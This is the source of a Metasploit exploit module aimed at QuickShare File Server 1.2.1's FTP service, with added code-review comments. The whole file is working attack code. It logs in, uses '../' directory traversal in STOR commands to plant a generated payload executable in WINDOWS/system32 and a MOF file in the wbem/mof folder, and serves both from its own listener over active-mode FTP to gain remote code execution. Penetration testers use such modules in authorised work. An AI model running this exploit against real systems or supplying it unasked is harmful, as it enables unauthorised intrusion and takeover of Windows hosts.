GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/quickshare_traversal_write.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  # Module metadata: name, references, payload constraints, target list and
  # the SRVPORT option used for FTP active-mode data connections.
  #
  # @param info [Hash] metadata merged by update_info before being passed to super
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "QuickShare File Server 1.2.1 Directory Traversal Vulnerability",
        'Description' => %q{
          This module exploits a vulnerability found in QuickShare File Server's FTP
          service. By supplying "../" in the file path, it is possible to trigger a
          directory traversal flaw, allowing the attacker to read a file outside the
          virtual directory. By default, the "Writable" option is enabled during account
          creation, therefore this makes it possible to create a file at an arbitrary
          location, which leads to remote code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'modpr0be', # Discovery, PoC
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['CVE', '2011-10010'],
          ['OSVDB', '70776'],
          ['EDB', '16105'],
          ['URL', 'http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html'],
          ['URL', 'http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/'],
          ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
          ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
          ['ATT&CK', Mitre::Attack::Technique::T1105_INGRESS_TOOL_TRANSFER]
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Targets' => [
          ['QuickShare File Server 1.2.1', {}]
        ],
        # Aggressive: the module opens its own listener (TcpServer) in addition
        # to the outbound FTP connection.
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Privileged' => false,
        'DisclosureDate' => '2011-02-03',
        'DefaultTarget' => 0,
        # Reliability/Stability/SideEffects are left UNKNOWN_*; nothing on this
        # page establishes better values.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Change the default description so this option makes sense
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
      ]
    )
  end

  # Banner-based check: connect, disconnect, then inspect the banner the FTP
  # mixin collected. Returns Detected rather than Vulnerable because the
  # regex carries no version string and so cannot tell 1.2.1 from a fixed build.
  #
  # @return [Msf::Exploit::CheckCode] Detected when the banner matches, Safe otherwise
  def check
    connect
    disconnect

    # NOTE(review): `banner` is assumed to be populated by the Ftp mixin's
    # connect and to survive disconnect — confirm against the framework version in use.
    if banner =~ /quickshare ftpd/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # TcpServer callback for each inbound active-mode data connection. The first
  # connection receives the executable, the second the MOF; any further
  # connection is closed without data. The peer address is not compared with
  # rhost, so whichever host reaches SRVPORT during the window gets the bytes.
  #
  # @param cli [Object] connected client socket handed over by the TcpServer mixin
  def on_client_connect(cli)
    peer = "#{cli.peerhost}:#{cli.peerport}" # FIXME: computed but never used

    # @stage starts as :exe (set in #exploit) and advances to :mof after the
    # first send.
    case @stage
    when :exe
      print_status("Sending executable (#{@exe.length.to_s} bytes)")
      cli.put(@exe)
      @stage = :mof

    when :mof
      print_status("Sending MOF (#{@mof.length.to_s} bytes)")
      cli.put(@mof)
    end

    cli.close
  end

  # Logs in to the FTP service, switches to binary mode, announces this
  # module's listener with PORT (active mode) and issues STOR for +filename+;
  # the server then connects back to SRVPORT and #on_client_connect supplies
  # the file contents. The method's value is whatever disconnect(conn) returns.
  #
  # @param filename [String] remote path passed verbatim to STOR
  # @raise [Msf::Exploit::Failed] via fail_with when USER or PASS is rejected
  def upload(filename)
    # select with no descriptors and a 1s timeout == a one-second pause
    select(nil, nil, nil, 1)

    peer = "#{rhost}:#{rport}" # FIXME: computed but never used
    print_status("Trying to upload #{::File.basename(filename)}")

    # We can't use connect_login, because it cannot determine a successful login correctly.
    # For example: The server actually returns a 503 (Bad Sequence of Commands) when the
    # user has already authenticated.
    conn = connect(false, datastore['VERBOSE'])

    res = send_user(datastore['FTPUSER'], conn)

    # Accept 331 (password required) or any 2xx reply.
    # NOTE(review): `^` matches at every line start of a multi-line reply; \A
    # would anchor to the start of the response — verify what send_user returns.
    if res !~ /^(331|2)/
      fail_with(Failure::BadConfig, "The server rejected our username: #{res.to_s}")
    end

    res = send_pass(datastore['FTPPASS'], conn)
    # 503 is tolerated for the reason given in the comment above.
    if res !~ /^(2|503)/
      fail_with(Failure::BadConfig, "The server rejected our password: #{res.to_s}")
    end

    # Switch to binary mode
    print_status("Set binary mode")
    send_cmd(['TYPE', 'I'], true, conn)

    # Prepare active mode: Get attacker's IP and source port
    # When SRVHOST is the wildcard, the address is the one the local routing
    # table selects toward 50.50.50.50, which is not necessarily the interface
    # the target can reach back — operators should set SRVHOST explicitly if not.
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
    src_port = datastore['SRVPORT'].to_i

    # Prepare active mode: Convert the IP and port for active mode
    # PORT takes h1,h2,h3,h4,p1,p2 — dotted quad with commas, port as high byte,low byte.
    src_ip = src_ip.gsub(/\./, ',')
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"

    # Set to active mode
    print_status("Set active mode \"#{src_ip},#{src_port}\"")
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

    # Tell the FTP server to download our file
    # The second argument is false here (true for TYPE/PORT above) — presumably
    # "do not wait for the reply"; confirm against send_cmd in the Ftp mixin.
    send_cmd(['STOR', filename], false, conn)

    disconnect(conn)
  end

  # Entry point. Builds the two file names behind a fixed "../" prefix,
  # generates the MOF and payload EXE, then runs the two FTP uploads in a
  # framework thread while +super+ starts the TcpServer listener that answers
  # the server's active-mode connections.
  def exploit
    trigger = '../../../../../../../../'
    exe_name = "#{trigger}WINDOWS/system32/#{rand_text_alpha(rand(10) + 5)}.exe"
    mof_name = "#{trigger}WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.vbs"
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
    @exe = generate_payload_exe
    @stage = :exe # consumed and advanced by #on_client_connect

    begin
      t = framework.threads.spawn("reqs", false) {
        begin
          # Upload our malicious executable
          u = upload(exe_name)

          # Upload the mof file
          # Gated on #upload's return value, i.e. whatever disconnect(conn) returned.
          upload(mof_name) if u
        # NOTE(review): rescuing ::Exception also catches SystemExit/Interrupt
        # and NoMemoryError inside the worker thread; StandardError is the
        # conventional class to rescue here.
        rescue ::Exception => e
          print_error e.message
          cleanup
        end
      }
      super
    ensure
      # NOTE(review): t is nil if spawn itself raised before assigning it;
      # `t&.kill` (or `t.kill if t`) avoids a NoMethodError masking the original error.
      t.kill
    end
  end
end